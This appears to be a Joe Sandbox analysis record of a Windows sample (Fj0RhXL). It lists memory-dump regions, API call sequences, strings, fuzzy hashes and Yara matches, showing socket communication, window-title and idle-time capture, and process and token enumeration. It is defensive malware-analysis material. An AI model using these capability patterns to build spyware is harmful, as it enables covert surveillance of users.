                                          • Source File: 00000006.00000002.3621984576.0000000002EB0000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EB0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2eb0000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Virtual$Alloc$Freeconnectrecvsendsocket
                                          • String ID: x32
                                          • API String ID: 799107390-2569000010
                                          • Opcode ID: 1764fd0751977d3884cf36413de808e311c9a7fd129ce8604c1fb90a25c6e9b1
                                          • Instruction ID: 5c2d42ab39c5c658d0fd2172ba757d7899e3eaab47de82dd24d6abbc229fb16c
                                          • Opcode Fuzzy Hash: 1764fd0751977d3884cf36413de808e311c9a7fd129ce8604c1fb90a25c6e9b1
                                          • Instruction Fuzzy Hash: DA51CC70940204EBCF26DF68C888BAF7BB9FF85718F149580F914AB196D770EA40CB90
                                          APIs
                                            • Part of subcall function 03D9ABD2: _malloc.LIBCMT ref: 03D9ABEC
                                          • _memset.LIBCMT ref: 03D967F1
                                          • GetLastInputInfo.USER32(?), ref: 03D96807
                                          • GetTickCount.KERNEL32 ref: 03D9680D
                                          • wsprintfW.USER32 ref: 03D96836
                                          • GetForegroundWindow.USER32 ref: 03D9683F
                                          • GetWindowTextW.USER32(00000000,00000020,000000FA), ref: 03D96853
                                          • _memmove.LIBCMT ref: 03D968CD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Window$CountForegroundInfoInputLastTextTick_malloc_memmove_memsetwsprintf
                                          • String ID: %d min
                                          • API String ID: 2941202404-1947832151
                                          • Opcode ID: da741cae7f1aa0bcecf4070f52b38ee46dc6a86c8620c27b36b62703cfc917a0
                                          • Instruction ID: ff820a81011bdac66d4fdee4c514fbed9885feee052cf3e596357e57a867be2b
                                          • Opcode Fuzzy Hash: da741cae7f1aa0bcecf4070f52b38ee46dc6a86c8620c27b36b62703cfc917a0
                                          • Instruction Fuzzy Hash: 054180B6D00214EFDB14DFA4C889A9EBBB9EF44710F088569E9099B345E674DA04CBE1
                                          APIs
                                          • GetCurrentProcessId.KERNEL32(90594F2A,00000000,00000000,75BF73E0,03DB0AC0,000000FF,?,03D87FB3,00000000), ref: 03D87E68
                                          • OpenProcess.KERNEL32(00000400,00000000,00000000,?,03D87FB3,00000000), ref: 03D87E77
                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,03D87FB3,00000000), ref: 03D87E8D
                                          • CloseHandle.KERNEL32(00000000,?,03D87FB3,00000000), ref: 03D87E98
                                          • SysStringLen.OLEAUT32(00000000), ref: 03D87EEB
                                          • SysStringLen.OLEAUT32(00000000), ref: 03D87EF9
                                          • _memmove.LIBCMT ref: 03D87F18
                                          • CloseHandle.KERNEL32(?), ref: 03D87F2A
                                          • CloseHandle.KERNEL32(00000000), ref: 03D87F2D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CloseHandleProcess$OpenString$CurrentToken_memmove
                                          • String ID:
                                          • API String ID: 1122806710-0
                                          • Opcode ID: 924bc27719fc10d729f5732c5a16d7a02b344af6b41dcf41b631875d983b7225
                                          • Instruction ID: 20f5acf7a5f2dd822cffad4e9cb8d0f8c78b09b7cf6cda42ec1436efeaec53f0
                                          • Opcode Fuzzy Hash: 924bc27719fc10d729f5732c5a16d7a02b344af6b41dcf41b631875d983b7225
                                          • Instruction Fuzzy Hash: F73173B3D04209EBDB11EFA5DC44AAFB7B9EF84710F65091AE915E7340DB75A900CBA0
                                          APIs
                                          • _fgetc.LIBCMT ref: 6C374B43
                                          • _sprintf.LIBCMT ref: 6C374B6F
                                            • Part of subcall function 6C3747B5: _sprintf.LIBCMT ref: 6C3747FA
                                            • Part of subcall function 6C3747B5: _sprintf.LIBCMT ref: 6C374846
                                            • Part of subcall function 6C3747B5: GetModuleFileNameA.KERNEL32(?,000000FF,?,?,?,00000000,00000000), ref: 6C374860
                                            • Part of subcall function 6C3747B5: _sprintf.LIBCMT ref: 6C3748A1
                                            • Part of subcall function 6C3747B5: _sprintf.LIBCMT ref: 6C3748D5
                                            • Part of subcall function 6C3747B5: _sprintf.LIBCMT ref: 6C37491C
                                          • _fgetc.LIBCMT ref: 6C374B90
                                          • _fgetc.LIBCMT ref: 6C374BC9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$_fgetc$FileModuleName
                                          • String ID: $@$The command file '%s' is not in any valid format (character %d).
                                          • API String ID: 1310815430-447543786
                                          • Opcode ID: 3f664455309f5cf085848be3d7e2369e85f6efcc0fe0c3882874766eae7a1051
                                          • Instruction ID: e28a913d9a62550b453577fa31a2b0c49d96a8b6a098e40977b1dea3164ab705
                                          • Opcode Fuzzy Hash: 3f664455309f5cf085848be3d7e2369e85f6efcc0fe0c3882874766eae7a1051
                                          • Instruction Fuzzy Hash: 7221ECB29451245AD7319A199C40FDE77BC9F8221CF110199F6C8B3B40DB3D6E8A8E7E
                                          APIs
                                          Strings
                                          • SwissEph file '%s' not found in PATH '%s', xrefs: 6C398587
                                          • error: file path and name must be shorter than %d., xrefs: 6C3985D3
                                          • .;C:\Astrolog\, xrefs: 6C3983DE
                                          • \, xrefs: 6C3984A8
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf
                                          • String ID: .;C:\Astrolog\$SwissEph file '%s' not found in PATH '%s'$\$error: file path and name must be shorter than %d.
                                          • API String ID: 1467051239-2281980244
                                          • Opcode ID: 9b3cfc0eaa4174e59983b200ab16bddd355d0e7e802f9ef65e7639e96e8dba28
                                          • Instruction ID: ab22dd41b4d5b04b275ce88bdf182b2a5b0e3b70067b0712f1315da1bf43b814
                                          • Opcode Fuzzy Hash: 9b3cfc0eaa4174e59983b200ab16bddd355d0e7e802f9ef65e7639e96e8dba28
                                          • Instruction Fuzzy Hash: 1151E6B0A0416D8FDB11DE28CD54AD9BBF5AF85308F0485FAD288E7602F6315ACD8F56
                                          APIs
                                          • _memset.LIBCMT ref: 03D882D9
                                          • RegOpenKeyExW.KERNEL32(80000001,03DB5BF8,00000000,00020019,75BF73E0), ref: 03D882FC
                                          • RegQueryValueExW.KERNEL32(75BF73E0,GROUP,00000000,00000001,?,00000208), ref: 03D8834A
                                          • lstrcmpW.KERNEL32(?,03DB5B0C), ref: 03D88360
                                          • lstrcpyW.KERNEL32(03D85E98,?), ref: 03D88372
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: OpenQueryValue_memsetlstrcmplstrcpy
                                          • String ID: GROUP
                                          • API String ID: 2102619503-2593425013
                                          • Opcode ID: f4f751badb2207bccc9ba69ab4153eedf7089d902e7ce5ba49d8d4b1e1b785c8
                                          • Instruction ID: 3cada94f9b7d637024db933ddd30a1a0fd53ec0a91615222232a70b5c747594e
                                          • Opcode Fuzzy Hash: f4f751badb2207bccc9ba69ab4153eedf7089d902e7ce5ba49d8d4b1e1b785c8
                                          • Instruction Fuzzy Hash: F9316771900318EBDB20DF95DC89B9EB7B8FB48710F544699E519E7280DB74AA44CF50
                                          APIs
                                          • ___set_flsgetvalue.LIBCMT ref: 03D9AF19
                                          • __calloc_crt.LIBCMT ref: 03D9AF25
                                          • __getptd.LIBCMT ref: 03D9AF32
                                          • CreateThread.KERNEL32(?,?,03D9AE8F,00000000,?,?), ref: 03D9AF69
                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 03D9AF73
                                          • _free.LIBCMT ref: 03D9AF7C
                                          • __dosmaperr.LIBCMT ref: 03D9AF87
                                            • Part of subcall function 03D9ADE6: __getptd_noexit.LIBCMT ref: 03D9ADE6
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                          • String ID:
                                          • API String ID: 155776804-0
                                          • Opcode ID: bd8a6aee792b7b9a41c71dc183f4f57a793226463b61a6bc0dd812128380b992
                                          • Instruction ID: d053632e10be7c1c62013a75ae60ac4e31f2d5797a00bf2059c56f80a94e9d5a
                                          • Opcode Fuzzy Hash: bd8a6aee792b7b9a41c71dc183f4f57a793226463b61a6bc0dd812128380b992
                                          • Instruction Fuzzy Hash: 0F110477204706AFFF15EFA99C40DAB77A8EF45770B10052AF9158E190EB31D80087B0
                                          APIs
                                          • ___set_flsgetvalue.LIBCMT ref: 02F07350
                                          • __calloc_crt.LIBCMT ref: 02F0735C
                                          • __getptd.LIBCMT ref: 02F07369
                                          • CreateThread.KERNEL32(?,?,02F072C6,00000000,?,?), ref: 02F073A0
                                          • GetLastError.KERNEL32(?,?,?,?,?,00000000), ref: 02F073AA
                                          • _free.LIBCMT ref: 02F073B3
                                          • __dosmaperr.LIBCMT ref: 02F073BE
                                            • Part of subcall function 02F0721D: __getptd_noexit.LIBCMT ref: 02F0721D
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__dosmaperr__getptd__getptd_noexit_free
                                          • String ID:
                                          • API String ID: 155776804-0
                                          • Opcode ID: 6d4e4ad57ca6bca4f484e34e5e8e3a253e5b3ee53cfd58685d57da0abba0d2e3
                                          • Instruction ID: 9cdc88bcc489672d359e79f8d30b2d8b2617cb94c81f4fab9c6986a1a09c380b
                                          • Opcode Fuzzy Hash: 6d4e4ad57ca6bca4f484e34e5e8e3a253e5b3ee53cfd58685d57da0abba0d2e3
                                          • Instruction Fuzzy Hash: 5E11A33254474AAFAB10BEA49CC0E5BB799EF447E0B400059FB14861C0DB71E510AEA0
                                          APIs
                                          • GetModuleHandleW.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,?,?,?,?,?,?,03D88A23), ref: 03D8893D
                                          • GetProcAddress.KERNEL32(00000000), ref: 03D88944
                                          • GetNativeSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03D88A23), ref: 03D88952
                                          • GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,03D88A23), ref: 03D8895A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: InfoSystem$AddressHandleModuleNativeProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 3433367815-192647395
                                          • Opcode ID: 50b9d9812d2138cc37edb4840b649869d7f9a0e0944b8366203fe20465279e3a
                                          • Instruction ID: ccd67a33a1141a4ce9b34d8f87fd2e9414a0a8cb0afb04998d6f10b368f572db
                                          • Opcode Fuzzy Hash: 50b9d9812d2138cc37edb4840b649869d7f9a0e0944b8366203fe20465279e3a
                                          • Instruction Fuzzy Hash: 9D012CB1D00209DFCB50FFB4C9456EEBBF4EB08600F5049A9D51AF3245EA759A00CB62
                                          APIs
                                          • ___set_flsgetvalue.LIBCMT ref: 03D9AE95
                                            • Part of subcall function 03DA288A: TlsGetValue.KERNEL32(00000000,03DA29E3,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000,00000000), ref: 03DA2893
                                            • Part of subcall function 03DA288A: DecodePointer.KERNEL32(?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000,00000000,?,03DA2AF0,0000000D), ref: 03DA28A5
                                            • Part of subcall function 03DA288A: TlsSetValue.KERNEL32(00000000,?,03D9FCE2,00000000,00000001,00000000,?,03DA8D2E,00000018,03DB79F0,0000000C,03DA8DBE,00000000,00000000,?,03DA2AF0), ref: 03DA28B4
                                          • ___fls_getvalue@4.LIBCMT ref: 03D9AEA0
                                            • Part of subcall function 03DA286A: TlsGetValue.KERNEL32(?,?,03D9AEA5,00000000), ref: 03DA2878
                                          • ___fls_setvalue@8.LIBCMT ref: 03D9AEB3
                                            • Part of subcall function 03DA28BE: DecodePointer.KERNEL32(?,?,?,03D9AEB8,00000000,?,00000000), ref: 03DA28CF
                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 03D9AEBC
                                          • ExitThread.KERNEL32 ref: 03D9AEC3
                                          • GetCurrentThreadId.KERNEL32 ref: 03D9AEC9
                                          • __freefls@4.LIBCMT ref: 03D9AEE9
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                          • String ID:
                                          • API String ID: 2383549826-0
                                          • Opcode ID: 25ec825fb7b3e5fae7fcdb4ea25b50af37eb57f1d928fe2c5a2261e5d0e6cfbd
                                          • Instruction ID: 15c0b8a28152c94207ec4afb5baa540a39db591e3a1c486b79c7b3a028e7304d
                                          • Opcode Fuzzy Hash: 25ec825fb7b3e5fae7fcdb4ea25b50af37eb57f1d928fe2c5a2261e5d0e6cfbd
                                          • Instruction Fuzzy Hash: BAF06D7A901B05EFDB08FF76CA0884E7BA8EF483443208D55F844CB315EA35D8428AB1
                                          APIs
                                          • ___set_flsgetvalue.LIBCMT ref: 02F072CC
                                            • Part of subcall function 02F09823: TlsGetValue.KERNEL32(00000000,02F0997C,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000), ref: 02F0982C
                                            • Part of subcall function 02F09823: DecodePointer.KERNEL32(?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000,?,02F09A89,0000000D), ref: 02F0983E
                                            • Part of subcall function 02F09823: TlsSetValue.KERNEL32(00000000,?,02F0A080,00000000,00000001,00000000,?,02F0C1E0,00000018,02F17BF0,0000000C,02F0C270,00000000,00000000,?,02F09A89), ref: 02F0984D
                                          • ___fls_getvalue@4.LIBCMT ref: 02F072D7
                                            • Part of subcall function 02F09803: TlsGetValue.KERNEL32(?,?,02F072DC,00000000), ref: 02F09811
                                          • ___fls_setvalue@8.LIBCMT ref: 02F072EA
                                            • Part of subcall function 02F09857: DecodePointer.KERNEL32(?,?,?,02F072EF,00000000,?,00000000), ref: 02F09868
                                          • GetLastError.KERNEL32(00000000,?,00000000), ref: 02F072F3
                                          • ExitThread.KERNEL32 ref: 02F072FA
                                          • GetCurrentThreadId.KERNEL32 ref: 02F07300
                                          • __freefls@4.LIBCMT ref: 02F07320
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: Value$DecodePointerThread$CurrentErrorExitLast___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4
                                          • String ID:
                                          • API String ID: 2383549826-0
                                          • Opcode ID: 0b2dea12d985b07be13e4d39fc6768c2633cb6b9eb7a7a292a7a079876fda2eb
                                          • Instruction ID: 395f8ce06925940227130a5bfeea30191fbbf33a6bb9bd74d6acd85bffb185de
                                          • Opcode Fuzzy Hash: 0b2dea12d985b07be13e4d39fc6768c2633cb6b9eb7a7a292a7a079876fda2eb
                                          • Instruction Fuzzy Hash: 88F03674900205AFD704BFB1CD94D4EBBEAAF84BC0791C454EA058B392EB74E442EF95
                                          APIs
                                          Strings
                                          • %s,%s, xrefs: 6C39FBF0
                                          • Please call swe_set_ephe_path() or swe_set_jplfile() before calling swe_fixstar() or swe_fixstar_ut(), xrefs: 6C39FB24
                                          • , xrefs: 6C39FFB2
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _memset_sprintf
                                          • String ID: $%s,%s$Please call swe_set_ephe_path() or swe_set_jplfile() before calling swe_fixstar() or swe_fixstar_ut()
                                          • API String ID: 1557529856-1540576256
                                          • Opcode ID: 4b1c769ca105f499d8681c8c56abd914f851e3ac7e151d2eb4de9f3a810707b1
                                          • Instruction ID: b8ebb72b381d9e198f15c304f2f38475f558ee400fa5b20fba734bdbba44fbb8
                                          • Opcode Fuzzy Hash: 4b1c769ca105f499d8681c8c56abd914f851e3ac7e151d2eb4de9f3a810707b1
                                          • Instruction Fuzzy Hash: 3122F272E0060DDBDF10EF94D884BDD7774FF09308F118599E89966690EB329AA8CF91
                                          APIs
                                          • _memset.LIBCMT ref: 03D877AC
                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,00000000), ref: 03D877B8
                                          • Process32FirstW.KERNEL32(00000000,00000000), ref: 03D877E9
                                          • Process32NextW.KERNEL32(00000000,0000022C), ref: 03D8783F
                                          • CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 03D87846
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memset
                                          • String ID:
                                          • API String ID: 2526126748-0
                                          • Opcode ID: 0f09731e1a37c5383eb71ffa7d0c624af942c8f766d69131be1963d31e5f1209
                                          • Instruction ID: 4fbd0cbd3e75891392700c1be987732b84dae3ca71251e5d5c22f2404c2a3579
                                          • Opcode Fuzzy Hash: 0f09731e1a37c5383eb71ffa7d0c624af942c8f766d69131be1963d31e5f1209
                                          • Instruction Fuzzy Hash: 5F21BA32610114DBDB20FF74EC89BEDB3B9EF18710F640AD9D80996280FB31AA45C691
                                          APIs
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F032E1
                                          • Sleep.KERNEL32(00000258), ref: 02F032EE
                                          • InterlockedExchange.KERNEL32(?,00000000), ref: 02F032F6
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F03302
                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 02F0330A
                                          • Sleep.KERNEL32(0000012C), ref: 02F0331B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: ObjectSingleWait$Sleep$ExchangeInterlocked
                                          • String ID:
                                          • API String ID: 3137405945-0
                                          • Opcode ID: e1e793c5d0a59bc205f359f4bea499fe9843583eca6f81d76be8821bcb4e3bac
                                          • Instruction ID: ac98a4983a8e0144fcc01f3662216f18f329101e3946f95aef9c6461d63a0460
                                          • Opcode Fuzzy Hash: e1e793c5d0a59bc205f359f4bea499fe9843583eca6f81d76be8821bcb4e3bac
                                          • Instruction Fuzzy Hash: 54F082722443086FD610EBE9DC84E46F3B8AFC5770B614B09F221872D0CAB0E8018BA0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: ,%s$.;C:\Astrolog\$NULL
                                          • API String ID: 0-2992153177
                                          • Opcode ID: 1e75dfbc3494208d6e050590a610f769720be5cd7640d450568c86d603c6870f
                                          • Instruction ID: a900feba6910aed501b44998bf38c1d024f4a4fd0dffff1e146a8df7eb3319e4
                                          • Opcode Fuzzy Hash: 1e75dfbc3494208d6e050590a610f769720be5cd7640d450568c86d603c6870f
                                          • Instruction Fuzzy Hash: F071F97190A16A5FCB11DF389C94BD9B7B8AB09318F2406F9E094D3691FB319A898F01
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 03D87BCB
                                          • CoCreateInstance.OLE32(03DB503C,00000000,00000001,03DB505C,?,?,?,?,?,?,?,?,?,?,03D85FAD), ref: 03D87BE2
                                          • SysFreeString.OLEAUT32(?), ref: 03D87C7C
                                          • CoUninitialize.OLE32(?,?,?,?,?,?,?,?,?,03D85FAD), ref: 03D87CAD
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CreateFreeInitializeInstanceStringUninitialize
